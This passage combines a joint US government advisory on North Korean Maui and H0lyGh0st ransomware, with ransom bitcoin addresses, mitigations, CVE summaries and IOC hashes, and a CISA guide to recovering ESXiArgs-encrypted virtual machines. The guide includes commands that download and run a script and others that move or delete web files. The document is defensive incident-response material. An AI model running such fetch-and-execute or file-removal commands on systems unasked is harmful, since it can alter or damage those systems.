- bc1qj6y72rk039mqpgtcy7mwjd3eum6cx6027ndgmd
- bc1qcp557vltuu3qc6pk3ld0ayagrxuf2thp3pjzpe
- bc1ql8wsflrjf9zlusauynzjm83mupq6c9jz9vnqxg
- bc1qx60ec3nfd5yhsyyxkzkpts54w970yxj84zrdck
- bc1qunqnjdlvqkjuhtclfp8kzkjpvdz9qnk898xczp
- bc1q6024d73h48fnhwswhwt3hqz2lzw6x99q0nulm4
- bc1qwdvexlyvg3mqvqw7g6l09qup0qew80wjj9jh7x
- bc1qavrtge4p7dmcrnvhlvuhaarx8rek76wxyk7dgg
- bc1qagaayd57vr25dlqgk7f00nhz9qepqgnlnt4upu
- bc1quvnaxnpqlzq3mdhfddh35j7e7ufxh3gpc56hca
- bc1qu0pvfmtxawm8s99lcjvxapungtsmkvwyvak6cs
- bc1qg3zlxxhhcvt6hkuhmqml8y9pas76cajcu9ltdl
- bc1qn7a3g23nzpuytchyyteyhkcse84cnylznl3j32
- bc1qhfmqstxp3yp9muvuz29wk77vjtdyrkff4nrxpu
- bc1qnh8scrvuqvlzmzgw7eesyrmtes9c5m78duetf3
- bc1q7qry3lsrphmnw3exs7tkwzpvzjcxs942aq8n0y
- bc1qcmlcxfsy0zlqhh72jvvc4rh7hvwhx6scp27na0
- bc1q498fn0gauj2kkjsg35mlwk2cnxhaqlj7hkh8xy
- bc1qnz4udqkumjghnm2a3zt0w3ep8fwdcyv3krr3jq
- bc1qk0saaw7p0wrwla6u7tfjlxrutlgrwnudzx9tyw
- bc1qyue2pgjk09ps7qvfs559k8kee3jkcw4p4vdp57
- bc1q6qfkt06xmrpclht3acmq00p7zyy0ejydu89zwv
- bc1qmge6a7sp659exnx78zhm9zgrw88n6un0rl9trs
- bc1qcywkd7zqlwmjy36c46dpf8cq6ts6wgkjx0u7cn

MITIGATIONS

Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the U.S. National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. For more information on the CPGs, including additional recommended baseline protections, see cisa.gov/cpg.

The authoring agencies urge HPH organizations to:

Limit access to data by authenticating and encrypting connections (e.g., using public key infrastructure certificates in virtual private network (VPN) and transport layer security (TLS) connections) with network services, Internet of Things (IoT) medical devices, and the electronic health record system [CPG 3.3].
Implement the principle of least privilege by using standard user accounts on internal systems instead of administrative accounts [CPG 1.5], which grant excessive system administration privileges.
Turn off weak or unnecessary network device management interfaces, such as Telnet, SSH, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
Protect stored data by masking the permanent account number (PAN) when displayed and rendering it unreadable when stored—through cryptography, for example.
Secure the collection, storage, and processing practices for personally identifiable information (PII)/protected health information (PHI), per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures could prevent the introduction of malware to the system [CPG 3.4].
- Secure PII/ PHI at collection points and encrypt the data at rest and in transit using technologies, such as TLS. Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available.
- Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.
Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer [CPG 8.1].
Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise [CPG 3.1].

In addition, the authoring agencies urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for and mitigate ransomware incidents:

Maintain isolated backups of data, and regularly test backup and restoration [CPG 7.3]. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
- Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident [CPG 7.1, 7.2].
- Organizations should also ensure their incident response and communications plans include data breach incidents response and notification procedures. Ensure the notification procedures adhere to applicable laws.
- See the CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.
Install updates for operating systems, software, and firmware as soon as they are released [CPG 5.1]. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Regularly check for software updates and end-of-life notifications and prioritize patching known exploited vulnerabilities. Consider leveraging a centralized patch management system to automate and expedite the process.
If you use Remote Desktop Protocol (RDP), or other potentially risky services, secure and monitor them closely [CPG 5.4].
- Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require phishing-resistant multifactor authentication (MFA) to mitigate credential theft and reuse [CPG 1.3]. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports [CPG 1.1, 3.1].
- Ensure devices are properly configured and that security features are enabled. Disable ports and protocols not in use for a business purpose (e.g., RDP Transmission Control Protocol port 3389).
- Restrict the Server Message Block (SMB) protocol within the network to only access necessary servers and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
- Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity [CPG 5.6, 6.2].
- Implement application control policies that only allow systems to execute known and permitted programs [CPG 2.1].
- Open document readers in protected viewing modes to help prevent active content from running.
Implement a user training program and phishing exercises [CPG 4.3] to raise awareness among users about the risks of visiting websites, clicking on links, and opening attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
Require phishing-resistant MFA for as many services as possible [CPG 1.3]—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
Use strong passwords [CPG 1.4] and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and National Institute of Standards and Technology (NIST) Special Publication 800-63B: Digital Identity Guidelines for more information.
Require administrator credentials to install software [CPG 1.5].
Audit user accounts with administrative or elevated privileges [CPG 1.5] and configure access controls with least privilege in mind.
Install and regularly update antivirus and antimalware software on all hosts.
Only use secure networks. Consider installing and using a VPN.
Consider adding an email banner to messages coming from outside your organizations [CPG 8.3] indicating that they are higher risk messages.
Consider participating in CISA’s no-cost Automated Indicator Sharing (AIS) program to receive real-time exchange of machine-readable cyber threat indicators and defensive measures.

If a ransomware incident occurs at your organization:

Follow your organization’s ransomware response checklist.
Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
U.S. organizations: Follow the notification requirements as outlined in your cyber incident response plan. Report incidents to appropriate authorities; in the U.S., this would include the FBI at a local FBI Field Office, CISA at cisa.gov/report, or the U.S. Secret Service (USSS) at a USSS Field Office.
South Korean organizations: Please report incidents to NIS, KISA (Korea Internet & Security Agency), and KNPA (Korean National Police Agency).
- NIS (National Intelligence Service)
  - Telephone : 111
  - https://www.nis.go.kr
- KISA (Korea Internet & Security Agency)
  - Telephone : 118 (Consult Service)
  - https://www.boho.or.kr/consult/ransomware.do
- KNPA (Korean National Police Agency)
  - Electronic Cybercrime Report & Management System: https://ecrm.police.go.kr/minwon/main
Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

RESOURCES

Stairwell provided a YARA rule to identify Maui ransomware, and a Proof of Concept public RSA key extractor at the following link:
https://www.stairwell.com/news/threat-research-report-maui-ransomware/

REQUEST FOR INFORMATION

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files. As stated above, the authoring agencies discourage paying ransoms. Payment does not guarantee files will be recovered and may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, the agencies understand that when victims are faced with an inability to function, all options are evaluated to protect shareholders, employees, and customers.

Regardless of whether you or your organization decide to pay a ransom, the authoring agencies urge you to promptly report ransomware incidents using the contact information above.

ACKNOWLEDGEMENTS

NSA, FBI, CISA, and HHS would like to thank ROK NIS and DSA for their contributions to this CSA.

Disclaimer of endorsement

The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Trademark recognition

Microsoft Threat Intelligence Center is a registered trademark of Microsoft Corporation. Apache®, Sonicwall, and Apache Log4j are trademarks of Apache Software Foundation. TerraMaster Operating System is a registered trademark of Octagon Systems.

Purpose

This document was developed in furtherance of the authors’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Appendix A: CVE Details

CVE-2021-44228 CVSS 3.0: 10 (Critical)
Vulnerability Description Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Recommended Mitigations Apply patches provided by vendor and perform required system updates.
Detection Methods See vendors’ Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability.
Vulnerable Technologies and Versions There are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, please check https://nvd.nist.gov/vuln/detail/CVE-2021-44228.
See https://nvd.nist.gov/vuln/detail/CVE-2021-44228 for more information.

CVE-2021-20038 CVSS 3.0: 9.8 (Critical)
Vulnerability Description A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
Recommended Mitigations Apply all appropriate vendor updates Upgrade to: SMA 100 Series - (SMA 200, 210, 400, 410, 500v (ESX, Hyper-V, KVM, AWS, Azure): SonicWall SMA100 build versions 10.2.0.9-41sv or later SonicWall SMA100 build versions 10.2.1.3-27sv or later System administrators should refer to the SonicWall Security Advisories in the reference section to determine affected applications/systems and appropriate fix actions. Support for 9.0.0 firmware ended on 10/31/2021. Customers still using that firmware are requested to upgrade to the latest 10.2.x versions.
Vulnerable Technologies and Versions Sonicwall Sma 200 Firmware 10.2.0.8-37Sv Sonicwall Sma 200 Firmware 10.2.1.1-19Sv Sonicwall Sma 200 Firmware 10.2.1.2-24Sv Sonicwall Sma 210 Firmware 10.2.0.8-37Sv Sonicwall Sma 210 Firmware 10.2.1.1-19Sv Sonicwall Sma 210 Firmware 10.2.1.2-24Sv Sonicwall Sma 410 Firmware 10.2.0.8-37Sv Sonicwall Sma 410 Firmware 10.2.1.1-19Sv Sonicwall Sma 410 Firmware 10.2.1.2-24Sv Sonicwall Sma 400 Firmware 10.2.0.8-37Sv Sonicwall Sma 400 Firmware 10.2.1.1-19Sv Sonicwall Sma 400 Firmware 10.2.1.2-24Sv Sonicwall Sma 500V Firmware 10.2.0.8-37Sv Sonicwall Sma 500V Firmware 10.2.1.1-19Sv Sonicwall Sma 500V Firmware 10.2.1.2-24Sv
See https://nvd.nist.gov/vuln/detail/CVE-2021-20038 for more information.

CVE-2022-24990 CVSS 3.x: N/A
Vulnerability Description The TerraMaster OS Unauthenticated Remote Command Execution via PHP Object Instantiation Vulnerability is characterized by scanning activity targeting a flaw in the script enabling a remote adversary to execute commands on the target endpoint. The vulnerability is created by improper input validation of the webNasIPS component in the api.php script and resides on the TNAS device appliances' operating system where users manage storage, backup data, and configure applications. By exploiting the script flaw a remote unauthenticated attacker can pass specially crafted data to the application and execute arbitrary commands on the target system. This may result in complete compromise of the target system, including the exfiltration of information. TNAS devices can be chained to acquire unauthenticated remote code execution with highest privileges.
Recommended Mitigations Install relevant vendor patches. This vulnerability was patched in TOS version 4.2.30
Vulnerable Technologies and Versions TOS v 4.2.29
See https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ and https://forum.terra-master.com/en/viewtopic.php?t=3030 for more information.

Appendix B: Indicators of Compromise (IOCs)

The IOC section includes hashes and IP addresses for the Maui and H0lyGh0st ransomware variants—as well as custom malware implants assumedly developed by DPRK cyber actors, such as remote access trojans (RATs), loaders, and other tools—that enable subsequent deployment of ransomware. For additional Maui IOCs, see joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.

Table 2 lists MD5 and SHA256 hashes associated with malware implants, RATs, and other tools used by DPRK cyber actors, including tools that drop Maui ransomware files.

*Table 2: File names and hashes of malicious implants, RATs, and tools*
MD5Hash	SHA256Hash
079b4588eaa99a1e802adf5e0b26d8aa	f67ee77d6129bd1bcd5d856c0fc5314169b946d32b8abaa4e680bb98130b38e7
0e9e256d8173854a7bc26982b1dde783	--
12c15a477e1a96120c09a860c9d479b3	6263e421e397db821669420489d2d3084f408671524fd4e1e23165a16dda2225
131fc4375971af391b459de33f81c253	--
17c46ed7b80c2e4dbea6d0e88ea0827c	b9af4660da00c7fa975910d0a19fda072031c15fad1eef935a609842c51b7f7d
1875f6a68f70bee316c8a6eda9ebf8de	672ec8899b8ee513dbfc4590440a61023846ddc2ca94c88ae637144305c497e7
1a74c8d8b74ca2411c1d3d22373a6769	ba8f9e7afe5f78494c111971c39a89111ef9262bf23e8a764c6f65c818837a44
1f6d9f8fbdbbd4e6ed8cd73b9e95a928	4f089afa51fd0c1b2a39cc11cedb3a4a326111837a5408379384be6fe846e016
2d02f5499d35a8dffb4c8bc0b7fec5c2	830207029d83fd46a4a89cd623103ba2321b866428aa04360376e6a390063570
2e18350194e59bc6a2a3f6d59da11bd8	655aa64860f1655081489cf85b77f72a49de846a99dd122093db4018434b83ae
3bd22e0ac965ebb6a18bb71ba39e96dc	6b7f566889b80d1dba4f92d5e2fb2f5ef24f57fcfd56bb594978dffe9edbb9eb
40f21743f9cb927b2c84ecdb7dfb14a6	5081f54761947bc9ce4aa2a259a0bd60b4ec03d32605f8e3635c4d4edaf48894
4118d9adce7350c3eedeb056a3335346	5b7ecf7e9d0715f1122baf4ce745c5fcd769dee48150616753fec4d6da16e99e
43e756d80225bdf1200bc34eef5adca8	afb2d4d88f59e528f0e388705113ae54b7b97db4f03a35ae43cc386a48f263a0
47791bf9e017e3001ddc68a7351ca2d6	863b707873f7d653911e46885e261380b410bb3bf6b158daefb47562e93cb657
505262547f8879249794fc31eea41fc6	f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c
5130888a0ad3d64ad33c65de696d3fa2	c92c1f3e77a1876086ce530e87aa9c1f9cbc5e93c5e755b29cad10a2f3991435
58ad3103295afcc22bde8d81e77c282f	18b75949e03f8dcad513426f1f9f3ca209d779c24cd4e941d935633b1bec00cb
5be1e382cd9730fbe386b69bd8045ee7	5ad106e333de056eac78403b033b89c58b4c4bdda12e2f774625d47ccfd3d3ae
5c6f9c83426c6d33ff2d4e72c039b747	a3b7e88d998078cfd8cdf37fa5454c45f6cbd65f4595fb94b2e9c85fe767ad47
640e70b0230dc026eff922fb1e44c2ea	6319102bac226dfc117c3c9e620cd99c7eafbf3874832f2ce085850aa042f19c
67f4dad1a94ed8a47283c2c0c05a7594	3fe624c33790b409421f4fa2bb8abfd701df2231a959493c33187ed34bec0ae7
70652edadedbacfd30d33a826853467d	196fb1b6eff4e7a049cea323459cfd6c0e3900d8d69e1d80bffbaabd24c06eba
739812e2ae1327a94e441719b885bd19	6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67
76c3d2092737d964dfd627f1ced0af80	bffe910904efd1f69544daa9b72f2a70fb29f73c51070bde4ea563de862ce4b1
802e7d6e80d7a60e17f9ffbd62fcbbeb	87bdb1de1dd6b0b75879d8b8aef80b562ec4fad365d7abbc629bcfc1d386afa6
827103a6b6185191fd5618b7e82da292	--
830bc975a04ab0f62bfedf27f7aca673	--
85995257ac07ae5a6b4a86758a2283d7	--
85f6e3e3f0bdd0c1b3084fc86ee59d19	f1576627e8130e6d5fde0dbe3dffcc8bc9eef1203d15fcf09cd877ced1ccc72a
87a6bda486554ab16c82bdfb12452e8b	980bb08ef3e8afcb8c0c1a879ec11c41b29fd30ac65436495e69de79c555b2be
891db50188a90ddacfaf7567d2d0355d	0837dd54268c373069fc5c1628c6e3d75eb99c3b3efc94c45b73e2cf9a6f3207
894de380a249e677be2acb8fbdfba2ef	--
8b395cc6ecdec0900facf6e93ec48fbb	--
92a6c017830cda80133bf97eb77d3292	d1aba3f95f11fc6e5fec7694d188919555b7ff097500e811ff4a5319f8f230be
9b0e7c460a80f740d455a7521f0eada1	45d8ac1ac692d6bb0fe776620371fca02b60cac8db23c4cc7ab5df262da42b78
9b9d4cb1f681f19417e541178d8c75d7	f5f6e538001803b0aa008422caf2c3c2a79b2eeee9ddc7feda710e4aba96fea4
a1f9e9f5061313325a275d448d4ddd59	dfdd72c9ce1212f9d9455e2bca5a327c88d2d424ea5c086725897c83afc3d42d
a452a5f693036320b580d28ee55ae2a3	99b0056b7cc2e305d4ccb0ac0a8a270d3fceb21ef6fc2eb13521a930cea8bd9f
a6e1efd70a077be032f052bb75544358	3b9fe1713f638f85f20ea56fd09d20a96cd6d288732b04b073248b56cdaef878
ad4eababfe125110299e5a24be84472e	a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa
b1c1d28dc7da1d58abab73fa98f60a83	38491f48d0cbaab7305b5ddca64ba41a2beb89d81d5fb920e67d0c7334c89131
b6f91a965b8404d1a276e43e61319931	--
bdece9758bf34fcad9cba1394519019b	9d6de05f9a3e62044ad9ae66111308ccb9ed2ee46a3ea37d85afa92e314e7127
c3850f4cc12717c2b54753f8ca5d5e0e	99b448e91669b92c2cc3417a4d9711209509274dab5d7582baacfab5028a818c
c50b839f2fc3ce5a385b9ae1c05def3a	458d258005f39d72ce47c111a7d17e8c52fe5fc7dd98575771640d9009385456
cf236bf5b41d26967b1ce04ebbdb4041	60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145
d0e203e8845bf282475a8f816340f2e8	f6375c5276d1178a2a0fe1a16c5668ce523e2f846c073bf75bb2558fdec06531
ddb1f970371fa32faae61fc5b8423d4b	dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
f2f787868a3064407d79173ac5fc0864	92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae
fda3a19afa85912f6dc8452675245d6b	56925a1f7d853d814f80e98a1c4890b0a6a84c83a8eded34c585c98b2df6ab19
--	0054147db54544d77a9efd9baf5ec96a80b430e170d6e7c22fcf75261e9a3a71
--	151ab3e05a23e9ccd03a6c49830dabb9e9281faf279c31ae40b13e6971dd2fb8
--	1c926fb3bd99f4a586ed476e4683163892f3958581bf8c24235cd2a415513b7f
--	1f8dcfaebbcd7e71c2872e0ba2fc6db81d651cf654a21d33c78eae6662e62392
--	f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb
--	23eff00dde0ee27dabad28c1f4ffb8b09e876f1e1a77c1e6fb735ab517d79b76
--	586f30907c3849c363145bfdcdabe3e2e4688cbd5688ff968e984b201b474730
--	8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
--	90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4
--	c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
--	ca932ccaa30955f2fffb1122234fb1524f7de3a8e0044de1ed4fe05cab8702a5
--	f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332
--	f78cabf7a0e7ed3ef2d1c976c1486281f56a6503354b87219b466f2f7a0b65c4

Table 3 lists MD5 and SHA256 hashes are associated with Maui Ransomware files.

*Table 3: File names and hashes of Maui ransomware files*
MD5 Hash	SHA256 Hash
4118d9adce7350c3eedeb056a3335346	5b7ecf7e9d0715f1122baf4ce745c5fcd769dee48150616753fec4d6da16e99e
9b0e7c460a80f740d455a7521f0eada1	45d8ac1ac692d6bb0fe776620371fca02b60cac8db23c4cc7ab5df262da42b78
fda3a19afa85912f6dc8452675245d6b	56925a1f7d853d814f80e98a1c4890b0a6a84c83a8eded34c585c98b2df6ab19
2d02f5499d35a8dffb4c8bc0b7fec5c2	830207029d83fd46a4a89cd623103ba2321b866428aa04360376e6a390063570
c50b839f2fc3ce5a385b9ae1c05def3a	458d258005f39d72ce47c111a7d17e8c52fe5fc7dd98575771640d9009385456
a452a5f693036320b580d28ee55ae2a3	99b0056b7cc2e305d4ccb0ac0a8a270d3fceb21ef6fc2eb13521a930cea8bd9f
a6e1efd70a077be032f052bb75544358	3b9fe1713f638f85f20ea56fd09d20a96cd6d288732b04b073248b56cdaef878
802e7d6e80d7a60e17f9ffbd62fcbbeb	87bdb1de1dd6b0b75879d8b8aef80b562ec4fad365d7abbc629bcfc1d386afa6
--	0054147db54544d77a9efd9baf5ec96a80b430e170d6e7c22fcf75261e9a3a71

Table 4 lists MD5 and SHA256 hashes associated with H0lyGh0st Ransomware files.

SHA256 Hash
99fc54786a72f32fd44c7391c2171ca31e72ca52725c68e2dde94d04c286fccd*
F8fc2445a9814ca8cf48a979bff7f182d6538f4d1ff438cf259268e8b4b76f86*
Bea866b327a2dc2aa104b7ad7307008919c06620771ec3715a059e675d9f40af*
6e20b73a6057f8ff75c49e1b7aef08abfcfe4e418e2c1307791036f081335c2d
f4d10b08d7dacd8fe33a6b54a0416eecdaed92c69c933c4a5d3700b8f5100fad
541825cb652606c2ea12fd25a842a8b3456d025841c3a7f563655ef77bb67219
2d978df8df0cf33830aba16c6322198e5889c67d49b40b1cb1eb236bd366826d
414ed95d14964477bebf86dced0306714c497cde14dede67b0c1425ce451d3d7
Df0c7bb88e3c67d849d78d13cee30671b39b300e0cda5550280350775d5762d8

MD5 Hash
a2c2099d503fcc29478205f5aef0283b
9c516e5b95a7e4169ecbd133ed4d205f
d6a7b5db62bf7815a10a17cdf7ddbd4b
c6949a99c60ef29d20ac8a9a3fb58ce5
4b20641c759ed563757cdd95c651ee53
25ee4001eb4e91f7ea0bc5d07f2a9744
18126be163eb7df2194bb902c359ba8e
eaf6896b361121b2c315a35be837576d
e4ee611533a28648a350f2dab85bb72a
e268cb7ab778564e88d757db4152b9fa

* from Microsoft blog post on h0lygh0st

CONTACT INFORMATION

NSA Client Requirements / General Cybersecurity Inquiries: CybersecurityReports@nsa.gov
Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
To report incidents and anomalous activity related to information found in this Joint Cybersecurity Advisory, contact CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870 or your local FBI field office at www.fbi.gov/contact-us/field. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

Media Inquiries / Press Desk:

NSA Media Relations, 443-634-0721, MediaRelations@nsa.gov
CISA Media Relations, 703-235-2010, CISAMedia@cisa.dhs.gov

ESXiArgs Ransomware Virtual Machine Recovery Guidance

CISA — Thu, 16 Feb 2023 13:50:04 EST

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) in response to the ongoing ransomware campaign, known as “ESXiArgs.” Malicious actors may be exploiting known vulnerabilities in VMware ESXi servers that are likely running unpatched and out-of-service or out-of-date versions of VMware ESXi software to gain access and deploy ransomware. The ESXiArgs ransomware encrypts configuration files on ESXi servers, potentially rendering virtual machines (VMs) unusable.

CISA has released an ESXiArgs recovery script at github.com/cisagov/ESXiArgs-Recover. Organizations that have fallen victim to ESXiArgs ransomware can use this script to attempt to recover their files. This CSA provides guidance on how to use the script.
ESXiArgs actors have compromised over 3,800 servers globally. CISA and FBI encourage all organizations managing VMware ESXi servers to:

Update servers to the latest version of VMware ESXi software,
Harden ESXi hypervisors by disabling the Service Location Protocol (SLP) service, and
Ensure the ESXi hypervisor is not exposed to the public internet.

If malicious actors have compromised your organization with ESXiArgs ransomware, CISA and FBI recommend following the script and guidance provided in this CSA to attempt to recover access to your files.

Download the PDF version of this report:

ESXiArgs Ransomware Virtual Machine Recovery Guidance (PDF, 711.08 KB )

Note: CISA and FBI will update this CSA as more information becomes available.

Technical Details

Open-source reporting indicates that malicious actors are exploiting known vulnerabilities in VMware ESXi software to gain access to servers and deploy ESXiArgs ransomware. The actors are likely targeting end-of-life ESXi servers or ESXi servers that do not have the available ESXi software patches applied.[1]

ESXiArgs ransomware encrypts certain configuration files on ESXi servers, potentially rendering VMs unusable. Specifically, the ransomware encrypts configuration files associated with the VMs; it does not encrypt flat files. As a result, it is possible, in some cases, for victims to reconstruct the encrypted configuration files based on the unencrypted flat file. The recovery script documented below automates the process of recreating configuration files. The full list of file extensions encrypted by the malware is: vmdk, vmx, vmxf, vmsd, vmsn, vswp, vmss, nvram, vmem.

Recovery Guidance

CISA and FBI do not encourage paying the ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, CISA and FBI urge you to promptly report ransomware incidents to a local FBI Field Office, or to CISA at cisa.gov/report.

CISA is providing these steps to enable organizations to attempt recovery of their VMs. CISA’s GitHub ESXiArgs recovery script, which also outlines these steps, is available at github.com/cisagov/ESXiArgs-Recover. CISA is aware that some organizations have reported success in recovering files without paying ransoms. CISA’s script is based on findings published by third-party researchers.[2]

Any organization seeking to use CISA’s ESXiArgs recovery script should carefully review the script to determine if it is appropriate for their environment before deploying it. This script does not seek to delete the encrypted configuration files, but instead seeks to create new configuration files that enable access to the VMs. While CISA works to ensure that scripts like this one are safe and effective, this script is delivered without warranty, either implicit or explicit. Do not use this script without understanding how it may affect your system. CISA does not assume liability for damage caused by this script. Note: Organizations that run into problems with the script can create a GitHub issue at https://github.com/cisagov/ESXiArgs-Recover/issues; CISA will do our best to resolve concerns.

Quarantine or take affected hosts offline to ensure that repeat infection does not occur.
Download CISA’s recovery script and save it as /tmp/recover.sh.
For example, with wget: wget -O /tmp/recover.sh https://raw.githubusercontent.com/cisagov/ESXiArgs-Recover/main/recover.sh.
Give the script execute permissions: chmod +x /tmp/recover.sh
Navigate to the folder of a VM you would like to recover and run ls to view the files.
- Note: You may browse these folders by running ls /vmfs/volumes/datastore1. For instance, if the folder is called example, run cd /vmfs/volumes/datastore1/example.
View files by running ls. Note the name of the VM (via naming convention: [name].vmdk).
Run the recovery script with /tmp/recover.sh [name], where [name] is the name of the VM determined previously.
- If the VM is a thin format, run /tmp/recover.sh [name] thin.
- If successful, the recovery script will output that it has successfully run. If unsuccessful, it may not be possible for the recovery script to recover your VMs; consider engaging external incident response help.
If the script succeeded, re-register the VM.
1. If the ESXi web interface is inaccessible, remove the ransom note and restore access via the following steps. (Note: Taking the steps below moves the ransom note to the file ransom.html. Consider archiving this file for future incident review.)
  - Run cd /usr/lib/vmware/hostd/docroot/ui/ && mv index.html ransom.html && mv index1.html index.html.
  - Run cd /usr/lib/vmware/hostd/docroot && mv index.html ransom.html && rm index.html && mv index1.html index.html.
  - Reboot the ESXi server (e.g., with the reboot command). After a few minutes, you should be able to navigate to the web interface.
  - In the ESXi web interface, navigate to the Virtual Machines page.
  - If the VM you restored already exists, right click on the VM and select Unregister (see figure 1).

Figure 1: Unregistering the virtual machine.

Select Create / Register VM (see figure 2).
Select Register an existing virtual machine (see figure 2).

Figure 2: Registering the virtual machine, selecting machine to register.

Click Select one or more virtual machines, a datastore or a directory to navigate to the folder of the VM you restored. Select the vmx file in the folder (see figure 3).

Figure 3: Registering the virtual machine, finalizing registration.

Select Next and Finish. You should now be able to use the VM as normal.

Figure 3: Registering the virtual machine, finalizing registration.

Select Next and Finish. You should now be able to use the VM as normal.

Update servers to the latest software version, disable the Service Location Protocol (SLP) service, and ensure the ESXi hypervisor is not configured to be exposed to the public internet before putting systems back online.

Additional Incident Response

The above script only serves as a method to recover essential services. Although CISA and FBI have not seen any evidence that the actors have established persistence, we recommend organizations take the following additional incident response actions after applying the script:

Review network logging to and from ESXi hosts and the guest VMs for unusual scanning activity.
Review traffic from network segments occupied by the ESXi hosts and guests. Consider restricting non-essential traffic to and from these segments.

If you detect activity from the above, implement your incident response plan. CISA and FBI urge you to promptly report ransomware incidents to a local FBI Field Office, or to CISA at cisa.gov/report.

Organizations should also collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.

